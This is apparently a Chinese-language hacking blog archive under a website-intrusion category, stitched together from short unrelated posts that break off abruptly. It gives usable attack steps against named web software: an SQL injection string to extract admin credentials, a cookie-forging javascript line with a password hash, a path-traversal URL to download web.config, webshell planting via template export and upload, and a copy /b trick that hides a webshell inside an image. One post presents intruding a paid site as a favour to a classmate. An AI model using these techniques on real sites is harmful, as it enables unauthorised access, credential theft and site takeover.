有人公布了,讯时漏洞问题真大 !!!!
/admin/admin_news_pl_view.asp?id=1 //id任意 填入以下语句
有时1显示错误信息的时候继续往后退2,3,4。。。。
|’+dfirst(“[user]“,”[admin]“)+chr(124)+dfirst(“[pass]“,”[admin]“),username=’
cookies进后台
javascript:alert(document.cookie=”adminuser=” + escape(“admin”));alert(document.cookie=”adminpass=” + escape(“480d6d6b4d57cc903f3bab877248da40″));
Archive for the ‘网站入侵’ Category
作者:w01f
方法1.直接下载load.ashx配置文件
http://www.xxxx.cn/CuteSoft_Client/CuteEditor/Load.ashx?type=image&file=../../../web.config
然后查看一些sql配置信息 从sql数据库连接入手
作者:char
如果服务器支持PHP,那么,在版块设置里面对某某版块设置上传格式里面增加php,可以传成功。上传地址在后台文件管理处查看。
这次这个后台提权漏洞是上个星期无意中发现的。
1、登录后台,风格界面-模板导出 在附加说明处写入一句话木马
作者:杀虫剂
出处:BHST安全小组
很多人知道也有很多人不知道科普知识,以下地址已做处理,话说在拿一个站SHELL提权,首先用WWWSCAN扫描敏感信息如后台,数据库,网站备份等 信息不多还好扫到了个上传页面!看看能不能利用
本文作者:陆羽 、Oldjun
漏洞介绍:uchome
思路很清晰,技术很牛逼
文章作者:xxbing
我很懒,懒贴得图。
【由于害怕怕被JC叔叔请去喝茶,我以下所发表的内容不完全代表本人的意见。不排除黑客入侵我机器,盗走都账号在此发表。文中网址都已和谐!该站点网址用www.xxbing.com代替】
美女同学要看言情小说,www.xxbing.com 的言情小说要收钱,于是就帮她找找“空子”!
在http://tool.chinaz.com/查了一下www.xxbing.com信息,日IP访问量快达到40W了。很牛逼呀。全站采用php构架。nignx服务器。好了,废话结束。进入正题。
嘿嘿,大家可能会说,上传漏洞有什么好玩的,但是有时真能遇上好玩的!
一上传漏洞,.NET aspx程序,同时支持asp,可以伪造文件头上传任意脚本文件,你上传上去执行可总是出错,要么是没有闭合,要么就是执行错误,不管你自己闭合,都不行
经过我了解..net文件上传过滤组件,过滤文件头,过滤文件尾
了解原理就好办了
1.txt存放你的一句话马
2.jpg 为一小图片文件,一定要小,比如qq表情图片
3:copy /b 2.jpg+1.txt 3.jpg 这样就伪造了文件头,但是现在传上去还不行,我接下来就用
4:copy /b 3.jpg+2.jpg 4.asp ok,现在文件头和文件尾都是正常的图片文件了
5:直接上传上去,一切ok,哈哈,小经验分享,牛淫们见笑了
思路为jhackj原创!
gongju
没米悬赏破md5密码了,发个原创文章。
问题是出在cache处理上,没有对写入cache的数据(我们可以控制的数据)进行过滤就直接写入到相应的php文件,导致可以拿webshell
当然前提是已经拿到了后台管理权限
漏洞分析:
图1:直接将cache写入到php文件:
可惜偶的学校漏洞补了
http://www.t00ls.net/thread-6316-1-1.html
首先,知己自彼,百战不已.我的文笔不好,大家自己看图说话,再加自己的幻想:
一般学校的锐捷模式都是如下:
802.1X实施方案采用了锐捷SAM计费管理系统,系统分为如下三个方面。
1. 认证服务器:RADIUS认证服务器 + SQL用户数据库 + jboss管理服务器;
2. RADIUS接入设备RAS:接入交换机(S2126G/S2150G),端口启用802.1X认证;
3. 客户端软件:用户需安装锐捷SAM客户端软件,通过802.1X认证后方可访问校园网。
一般两种方法:
第一:
前提知道数据库路经,并且改成asp或asa后缀!阿江计数 程序,可以通过
http://网站 /stat.asp?style=text&referer=代码内容&screenwidth=1024
